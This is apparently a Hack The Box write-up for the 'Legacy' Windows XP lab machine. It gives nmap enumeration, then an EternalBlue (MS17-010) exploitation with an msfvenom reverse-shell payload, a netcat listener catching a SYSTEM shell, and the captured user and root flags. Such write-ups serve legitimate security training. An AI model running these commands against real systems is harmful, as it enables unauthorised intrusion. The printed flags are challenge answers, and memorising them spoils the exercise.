Legacy - Hack The Box

N/A
hackthebox
Author

0xPThree

Published

April 14, 2019

{: style=“float: right; width: 200px; margin-left: 2em”}

N/A







USER

Enumeration

[root:/git/htb]# nmap -Pn -n -sCV 10.10.10.4 --open                                                                               (master✱)
  PORT    STATE SERVICE      VERSION
  139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
  445/tcp open  microsoft-ds Windows XP microsoft-ds
  Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

  Host script results:
  |_clock-skew: mean: 5d01h01m15s, deviation: 1h24m50s, median: 5d00h01m15s
  |_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:11:0b (VMware)
  | smb-os-discovery:
  |   OS: Windows XP (Windows 2000 LAN Manager)
  |   OS CPE: cpe:/o:microsoft:windows_xp::-
  |   Computer name: legacy
  |   NetBIOS computer name: LEGACY\x00
  |   Workgroup: HTB\x00
  |_  System time: 2021-03-01T12:38:45+02:00
  | smb-security-mode:
  |   account_used: <blank>
  |   authentication_level: user
  |   challenge_response: supported
  |_  message_signing: disabled (dangerous, but default)
  |_smb2-time: Protocol negotiation failed (SMB2)


[root:/git/htb]# nmap -p139,445 --script vuln 10.10.10.4                                                                          (master✱)
  PORT    STATE SERVICE
  139/tcp open  netbios-ssn
  445/tcp open  microsoft-ds

  Host script results:
  |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
  | smb-vuln-ms08-067:
  |   VULNERABLE:
  |   Microsoft Windows system vulnerable to remote code execution (MS08-067)
  |     State: LIKELY VULNERABLE
  |     IDs:  CVE:CVE-2008-4250
  |           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
  |           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
  |           code via a crafted RPC request that triggers the overflow during path canonicalization.
  |
  |     Disclosure date: 2008-10-23
  |     References:
  |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
  |_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
  |_smb-vuln-ms10-054: false
  |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
  | smb-vuln-ms17-010:
  |   VULNERABLE:
  |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
  |     State: VULNERABLE
  |     IDs:  CVE:CVE-2017-0143
  |     Risk factor: HIGH
  |       A critical remote code execution vulnerability exists in Microsoft SMBv1
  |        servers (ms17-010).
  |
  |     Disclosure date: 2017-03-14
  |     References:
  |       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
  |       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
  |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

MS17-010 EternalBlue is the obvious attack path here, lets exploit it.

a) Download the script send_and_execute.py
b) Create your malicious payload:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4488 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe

c) Execute!

[root:/git/htb/legacy]# python send_and_execute.py 10.10.14.10 ms17-010.exe                                                       (master✱)
  Traceback (most recent call last):
    File "send_and_execute.py", line 2, in <module>
      from impacket import smb, smbconnection
  ImportError: No module named impacket
d) If you get the error like above, it’s because your python2 version is to new.
d1) uninstall pip3: sudo apt-get remove python3-pip
d2) Get pip3 installer: curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py
d3) Install pip3: python3 get-pip.py
d4) Get pip2 installer: curl https://bootstrap.pypa.io/2.7/get-pip.py -o get-pip.py
d5) Install pip2: python get-pip.py
d6) Now you can install any pip2 modules: pip install impacket
d7) Make sure your python and python-pip are compatible. Python version 2.7.18 and pip 20.3.4 is preffered.
[root:/git/htb/legacy]# python -m pip -V                                                                                          (master✱)
  pip 20.3.4 from /usr/local/lib/python2.7/dist-packages/pip (python 2.7)

[root:/git/htb/legacy]# python -V                                                                                                 (master✱)
  Python 2.7.18

e) EXECUTE EXPLOIT AGAIN!

[root:/git/htb/legacy]# python send_and_execute.py 10.10.10.4 ms17-010.exe                                                        (master✱)
  Trying to connect to 10.10.10.4:445
  Traceback (most recent call last):
    File "send_and_execute.py", line 1077, in <module>
      exploit(target, port, pipe_name)
    File "send_and_execute.py", line 794, in exploit
      conn = MYSMB(target, port)
    File "/git/htb/legacy/mysmb.py", line 118, in __init__
      smb.SMB.__init__(self, remote_host, remote_host, timeout=timeout)
    File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2434, in __init__
      self._sess = nmb.NetBIOSTCPSession(my_name, remote_name, remote_host, host_type, sess_port, self.__timeout)
    File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 893, in __init__
      timeout=timeout, local_type=local_type, sock=sock)
    File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 752, in __init__
      self._sock = self._setup_connection((remote_host, sess_port), timeout)
    File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 904, in _setup_connection
      raise socket.error("Connection error (%s:%s)" % (peer[0], peer[1]), e)
  socket.error: [Errno Connection error (10.10.10.4:445)] timed out

f) If above happens, reboot the box and execute a third time.

[root:/git/htb/legacy]# python send_and_execute.py 10.10.10.4 ms17-010.exe                                                        (master✱)
  Trying to connect to 10.10.10.4:445
  Target OS: Windows 5.1
  Using named pipe: browser
  Groom packets
  attempt controlling next transaction on x86
  success controlling one transaction
  modify parameter count to 0xffffffff to be able to write backward
  leak next transaction
  CONNECTION: 0x82208430
  SESSION: 0xe1a57430
  FLINK: 0x7bd48
  InData: 0x7ae28
  MID: 0xa
  TRANS1: 0x78b50
  TRANS2: 0x7ac90
  modify transaction struct for arbitrary read/write
  make this SMB session to be SYSTEM
  current TOKEN addr: 0xe2116d30
  userAndGroupCount: 0x3
  userAndGroupsAddr: 0xe2116dd0
  overwriting token UserAndGroups
  Sending file KCC2VY.exe...
  Opening SVCManager on 10.10.10.4.....
  Creating service vteS.....
  Starting service vteS.....
  The NETBIOS connection with the remote host timed out.
  Removing service vteS.....
  ServiceExec Error on: 10.10.10.4
  nca_s_proto_error
  Done
    [root:/opt/impacket]# nc -lvnp 4488                                                                                                (master)
      listening on [any] 4488 ...
      connect to [10.10.14.10] from (UNKNOWN) [10.10.10.4] 1031
      Microsoft Windows XP [Version 5.1.2600]
      (C) Copyright 1985-2001 Microsoft Corp.

      C:\WINDOWS\system32>

      C:\Documents and Settings\john\Desktop>type user.txt
        e69af0e4f443de7e36876fda4ec7644f

      C:\Documents and Settings\Administrator\Desktop>type root.txt
        993442d258b0e0ec917cae9e695d5713

References